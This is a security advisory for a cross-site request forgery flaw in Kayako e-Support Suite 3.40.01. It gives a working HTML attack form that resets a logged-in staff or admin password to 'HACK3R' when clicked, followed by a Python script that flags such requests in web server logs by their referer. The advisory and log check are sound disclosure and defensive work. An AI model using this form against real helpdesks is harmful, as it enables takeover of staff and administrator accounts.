Kayako e-Support Suite CSRF - password change vulnerability

Software: Kayako Support Suite
Version: Latest version [3.40.01] - not tested with older versions
http://www.kayako.com/solutions/supportsuite
Vulnerability Type: CSRF - User [Staff / Admin] Password Change Vulnerability
Discovered by: Str0ss
mail.str0ss[_aT]gmail[_dOt]com
Ref: http://maestro-sec.com/forum/viewtopic.php?f=9&t=2006

About the software
-------------------
Kayako e-Support incorporates Kayako's leading ticket and e-mail management support desk software, including knowledgebase, troubleshooter, news and downloads publishing tools. It offers end users a variety of self-help resources, such as guided troubleshooters and a searchable knowledgebase. This software is used by many leading companies.

Exploit code
--------------------
- For exploitation, the user [Staff / Admin] must be logged in as staff to the eSupport Suite.
- The user should click the 'Launch Attack' button.
- After successful exploitation, the victim's password will be 'HACK3R'.
--------------------
<html>
<body>
<form name="staffform" id="staffform" action="http[s]://<TARGET>/staff/index.php?_m=core&_a=changepassword" method="POST">
<input type="hidden" name="password" id="password" value="HACK3R" size="20" />
<input type="hidden" name="passwordconfirm" id="passwordconfirm" value="HACK3R" size="20" />
<input type="submit" name="submitbutton" value="Launch Attack" />
<br>
** User [staff] must be logged in
<input type="hidden" name="_m" value="core"/>
<input type="hidden" name="_a" value="changepassword"/>
<input type="hidden" name="step" value="1"/>
</form>
</body>
</html>
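
One way to look for the request described above in web server logs, as an added example that is not part of the original advisory. It assumes Apache/nginx "combined" log format, that `_m` and `_a` appear in the query string as in the form action above, and a placeholder hostname `helpdesk.example.com`; all function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the helpdesk's own hostname (placeholder, not from the advisory).
HELPDESK_HOST = "helpdesk.example.com"

# "combined" format: ip - - [ts] "METHOD URI PROTO" status bytes "referer" "ua"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def is_password_change(method, uri):
    """True for a POST to the staff password-change endpoint named in the advisory."""
    parts = urlsplit(uri)
    query = parse_qs(parts.query)
    return (method == "POST"
            and parts.path.endswith("/staff/index.php")
            and query.get("_m") == ["core"]
            and query.get("_a") == ["changepassword"])

def classify(line):
    """Return None (not relevant), 'same-host', 'cross-host' or 'no-referer'."""
    m = LINE_RE.match(line)
    if not m or not is_password_change(m["method"], m["uri"]):
        return None
    referer = m["referer"]
    if referer in ("", "-"):
        return "no-referer"
    host = (urlsplit(referer).hostname or "").lower()
    return "same-host" if host == HELPDESK_HOST else "cross-host"

def suspicious(lines):
    """Yield (timestamp, client ip, verdict) for password changes worth reviewing."""
    for line in lines:
        verdict = classify(line)
        if verdict in ("cross-host", "no-referer"):
            m = LINE_RE.match(line)
            yield m["ts"], m["ip"], verdict

# Constructed sample log lines (not taken from a real server).
_FMT = ('198.51.100.7 - - [12/Mar/2010:10:01:02 +0000] '
        '"%s /staff/index.php?%s HTTP/1.1" 200 512 "%s" "Mozilla/5.0"')
SAMPLE = [
    _FMT % ("POST", "_m=core&_a=changepassword", "https://helpdesk.example.com/staff/index.php"),
    _FMT % ("POST", "_m=core&_a=changepassword", "http://forum.example.net/viewtopic.php?t=1"),
    _FMT % ("POST", "_m=core&_a=changepassword", "-"),
    _FMT % ("GET", "_m=tickets&_a=manage", "https://helpdesk.example.com/staff/index.php"),
]
```

A missing Referer is reported separately from a foreign one because privacy settings and proxies can strip the header from legitimate requests; correlate either verdict with a staff password reset or lockout report before treating it as an incident.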